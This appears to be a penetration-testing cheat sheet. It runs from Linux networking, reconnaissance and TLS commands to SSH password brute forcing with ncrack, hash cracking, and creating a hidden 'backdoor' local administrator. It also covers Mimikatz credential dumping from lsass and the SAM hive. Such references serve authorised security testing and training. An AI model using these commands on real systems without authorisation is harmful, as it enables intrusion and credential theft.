Basic #Linux Networking Tools
Show IP configuration:
# ip a lw
Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up
Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0
DNS lookup:
# dig compass-security.com
Reverse DNS lookup:
# dig -x 10.5.23.42
Information Gathering
Find owner/contact of domain or IP address:
# whois compass-security.com
Get nameservers and test for DNS zone transfer:
# dig example.com ns
# dig example.com axfr @n1.example.com
Get hostnames from CT logs: Search for
%.compass-security.com on https://crt.sh.
Or using an nmap script:
# nmap -sn -Pn compass-security.com
–script hostmap-crtsh
TLS Tools
Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048
-keyout key.pem -out cert.pem -nodes
-subj “/CN=example.org/”
Start TLS Server:
# ncat –ssl -l -p 1337 –ssl-cert
cert.pem –ssl-key key.pem
Connect to TLS service:
# ncat –ssl 10.5.23.42 1337
Connect to TLS service using openssl:
# openssl s_client -connect
10.5.23.42:1337
TCP to TLS proxy:
# socat TCP-LISTEN:2305,fork,reuseaddr
ssl:example.com:443
Online TLS tests:
ssllabs.com, hardenize.com
HP TOOLz 👇🌟🌟👇
Useful tcpdump options:
-i interface: Interface or any for all
-n: Disable name and port resolution
-A: Print in ASCII
-XX: Print in hex and ASCII
-w file: Write output PCAP file
-r file: Read PCAP file
Vulnerability DBs and Exploits
Exploit search (local copy of the Exploit-DB):
# searchsploit apache
Show exploit file path and copy it into clipboard:
# searchsploit -p 40142
Online vulnerability and exploit databases:
cvedetails.com, exploit-db.com,
packetstormsecurity.com
Cracking
Try SSH passwords from a wordlist:
# ncrack -p 22 –user root -P
./passwords.txt 10.5.23.0/24
Determine hash type:
# hashid 869d[…]bd88
Show example hash types for hashcat:
# hashcat –example-hashes
Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt
/path/to/wordlists/*
Crack hashes using John the Ripper:
# john hashes.txt
Windows Privilege Escalation
Copy PowerUp.ps1 from GitHub “PowerShellMafia/
PowerSploit” into PowerShell to
bypass ExecutionPolicy and execute Invoke-
AllChecks. Use the abuse functions.
Add a new local admin:
C:\> net user backdoor P@ssw0rd23
C:\> net localgroup Administrators
backdoor /add
Scan for network shares:
# smbmap.py –host-file smbhosts.txt –
u Administrator -p PasswordOrHash
Windows Credentials Gathering
Start Mimikatz and create log file:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
Read lsass.exe process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.
Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords
Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv
Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv
/sam:sam.hiv
Active Directory
Use SharpHound to gather information and import
into Bloodhound to analyze
Download PingCastle from pingcastle.com and
generate Report
Show certificate details:
# openssl s_client -connect
10.5.23.42:1337 | openssl x509 -text
Test TLS server certificate and ciphers:
# sslyze –regular 10.5.23.42:443